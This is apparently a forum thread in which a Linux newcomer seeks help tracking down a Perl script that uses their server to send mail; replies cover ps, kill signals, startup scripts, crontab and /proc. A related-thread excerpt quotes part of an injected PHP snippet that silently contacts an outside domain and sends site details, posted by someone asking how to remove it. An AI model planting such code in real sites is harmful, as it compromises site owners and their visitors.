Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box. How do I find the script via terminal and how do I then remove it?
There are a few possible approaches here, but first a bit more info would be ideal. Is this Perl script somewhere in someone's Web space on a shared Web server running Apache, and somehow it's getting triggered and causing the shared Web server to start sending out spam ? Or is the situation something different ?
If you can give some idea of the typical role of this server, what exact OS and distribution it's running, what processes you'd expect to see running on it (i.e. does it ever run any Perl for legitimate reasons), and what your findings are so far, that would be a big help.
How do I find the script via terminal and how do I then remove it?
Every running program (more precisely: every instance of a running program, because the same program could be started more than once) is a "process" in UNIX. Processes are managed in a table by the kernel and there is a command to display (parts of) this table: ps. ps has many many options (too many to explain them all here) but you might want to start with this (a sample output is below):
What you see is the owner of the process ("UID"), the process' ID ("PID"), which is unique for every running process. (Unique in the sense that every running process is guaranteed to have a different number. Once it stops and the number becomes unused it can be reused by the next process.). Furthermore there is the parent process' ID ("PPID", more on that below) and the command used to invoke the process ("CMD") - some are enclosed in square brackets (i.e. "[kthreadd]"), signifying kernel threads where no real command in the classical sense was used to start them.
To stop a process note its PID and send it a signal (a kind-of message), using the kill command:
Code:
# kill -15 PID1 PID2 PID3 ...
15 is the signal which tells a process to stop running and relinquish all its allocated resources: this is the most gentle and preferable way to do it, because a process will not just be stopped no matter what but given the opportunity to i.e. close opened files, release shared memory segments which won't be needed after it stops, etc. - in one word, cleaning up. Well-written programs will honor this signal and indeed quit as soon as they managed to clean up.
Less well-written programs might ignore this, though, and then (but only then!) you can use signal 9 instead. This is not a signal in the common sense (at least not to the program), but the command to the OS kernel to immediately terminate the program, regardless of it wanting to stop or not. If signal 15 is the asking to kindly commit suicide after phrasing your last will, signal 9 is a headshot. Note that signal 9 is used if you must, not because you can! It harms the stability of the kernel to use it and hence more gentle methods are preferred as long as they work.
A word about process hierarchies and the PPID: all process in a UNIX system are organized in a tree: each process can have multiple child processes which in turn can have one or more children of their own and so on. The root of this process tree is "init" (in modern Linux systems "systemd"), which always has PID 1. Every child process has the PID of its parent in the field PPID, so you can reconstruct the (part-)tree from there. Kill the parent and all children will die equally with it. Kill the init-process and you have shut down the whole system immediately (and a good chance to have damaged the system in the way, so don't try that on a system you need, at least not without necessity).
At last a word about how to avoid the program starting again: you need to find out from where it was started in first place. The PPID field might help with this. Common possibilities include:
- starting process: each UNIX system has a booting process and there are two general flavors of this: System V and BSD. System V-like systems execute first programs noted in the file /etc/inittab. If this file exists, have a look there.
- run levels: BSD- and System V-like systems use so-called "run levels" and execute a series of start-stop-scripts located in /etc/rc.d/rcN where N is a number between 1 and 6. These are directories in which scripts with names starting with "K" (kill) and "S" are located. When a certain run-level is entered all the the S-scripts in that level are executed. When the run-level is switched, all K-scripts of the current runlevel are executed first, then all S-scripts of the new run-level are executed. Have a look there.
- cron: UNIX has its own job-scheduler which can be used to repetitively start certain jobs at certain times. For every user there is its own Job list which you can display by switching into this user account and entering the command:
Code:
# crontab -l
You can edit this list with the command
Code:
# crontab -e
by removing the line with the call to the perl-program once you have found it.
Notice, that most to all these activities need you to gain access to the root user and that all these activities are potentially harmful to your system. If you do not know exactly what you do - DON'T DO IT! Otherwise you are risking your system. It is possible to voluntarily ruin a UNIX system beyond repair as root.
Here is what support sent me. I'm suppose to do this myself. Yes, someone else got into terminal cause when remotely logged in I saw this last Login: the feb 23 14:59:13 2017 from phrank.aus.us.siteprotect.com
and then this happened:
When I'm trying to track down rogue processes on a Linux system, I find the /proc filesystem valuable. If you have full shell access (and it seems you do), and the rogue Perl process is still running with PID 4600 (or if you can see what its current PID is), try doing ls -l /proc/4600 and ls -l /proc/4600/fd/. This might reveal something of the directory that the underlying process is stored in, or at least give you some clues.
In that 'top' listing, I also have to say I don't much like the look of PIDs 4599, 4334 and 4552. Basically you should pay close attention to any process that's owned by the user 'apache' but claims to be anything other than 'httpd'.
---------- Post updated at 10:28 PM ---------- Previous update was at 10:25 PM ----------
Hi,
Also, one other quick thought - have a good look through /tmp, /var/tmp and /var/run. Especially look for hidden files (files whose name starts with a dot) by means of ls -a . The '-a' flag shows such files in a directory listing, and can be combined with other flags such as '-l'.
and the other. Terminal said there was no such thing as 1s. I am using -bash: in front of everything but the| grep perl revealed 2 instances of perl.
usr/bin/perl and usr/sbin/hspc-plugin-rpc.fcgi which contained
Code:
use strict;
use CGI::Fast();
use Pod::WSDL;
use SOAP::Lite;
use SOAP::Transport::HTTP;
use HSPC::Config;
use HSPC::Plugin::SOAP::Common;
use HSPC::Plugin::SOAP::Struct;
use HSPC::Plugin::SOAP::PP;
$ENV{"plugin_soap_common"} = HSPC::Plugin::SOAP::Common->new();
my $remote_uri = "https://".$CONFIG{"SERVER_NAME"}.":".$CONFIG{"SERVER_PORT"}."/HSPC/Plugin/SOAP";
my $local_uri = "https://127.0.0.1:".$CONFIG{"SERVER_PORT"}."/HSPC/Plugin/SOAP";
my $cgi = SOAP::Transport::HTTP::FCGI
-> dispatch_with({
$remote_uri."/WebServices" => "HSPC::Plugin::SOAP::WebServices",
$local_uri."/WebServices" => "HSPC::Plugin::SOAP::WebServices",
$remote_uri."/Common" => "HSPC::Plugin::SOAP::Common",
$local_uri."/Common" => "HSPC::Plugin::SOAP::Common",
$remote_uri."/PP" => "HSPC::Plugin::SOAP::PP",
$local_uri."/PP" => "HSPC::Plugin::SOAP::PP",
$remote_uri."/PM" => "HSPC::Plugin::SOAP::PM",
$local_uri."/PM" => "HSPC::Plugin::SOAP::PM",
$remote_uri."/DM" => "HSPC::Plugin::SOAP::DM",
$local_uri."/DM" => "HSPC::Plugin::SOAP::DM",
})
-> handle
;
0;
I have no idea if this is suppose to be here or not.
Can I just check - it looks from what you've said that you're trying to type 1s (that's a number one followed by a lower-case letter 'S') rather than ls (that's a lower-case letter 'L' followed by a lower-case letter 'S', which is the correct command).
If that's what you've been doing, could you try again with the correct command name and see what happens please ?
If you have been typing it correctly then your system must be quite badly damaged or missing some very fundamental binaries, since the ls command is pretty much as common as it gets on any UNIX-style system.
I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open())
I would like to run another PERL-script from first one, not... (1 Reply)
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Hi All,
I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ??
print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">");
print("<input type = "text"... (1 Reply)
I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard.
From parent.pl
$input1=123;
$input2=abc;
I tried calling it with
system("/usr/bin/perl child.pl $input1 $input2");
and
`perl... (1 Reply)
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
02-23-2017
